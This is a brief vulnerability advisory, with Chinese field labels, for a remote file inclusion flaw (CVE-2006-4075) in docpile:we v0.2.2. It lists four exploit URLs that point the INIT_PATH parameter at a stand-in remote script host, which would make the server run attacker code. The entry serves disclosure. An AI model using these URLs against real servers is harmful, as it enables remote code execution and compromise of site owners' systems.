关键信息 漏洞标题: docpile:we v0.2.2 (INIT_PATH) Remote File Inclusion Vulnerability 发布日期: 2006.08.13 攻击类型: Remote CVE ID: CVE-2006-4075 CVSS 基础分数: 5.1/10 漏洞描述: This is a Remote File Inclusion (RFI) vulnerability in docpile:we v0.2.2. The vulnerability arises due to the improper handling of the parameter, which allows an attacker to include external files on the server. 漏洞利用示例: http://www.site.com/[path]/lib/folder.class.php?INIT_PATH=http://evil_script? http://www.site.com/[path]/lib/email.inc.php?INIT_PATH=http://evil_script? http://www.site.com/[path]/lib/document.class.php?INIT_PATH=http://evil_script? http://www.site.com/[path]/lib/auth.inc.php?INIT_PATH=http://evil_script? 影响: This vulnerability can lead to partial confidentiality, integrity, and availability impacts, allowing an attacker to potentially execute arbitrary code on the server. 作者: xoron 联系邮箱: x0r0n[at]hotmail[dot]com URL: http://docpile-we.berlios.de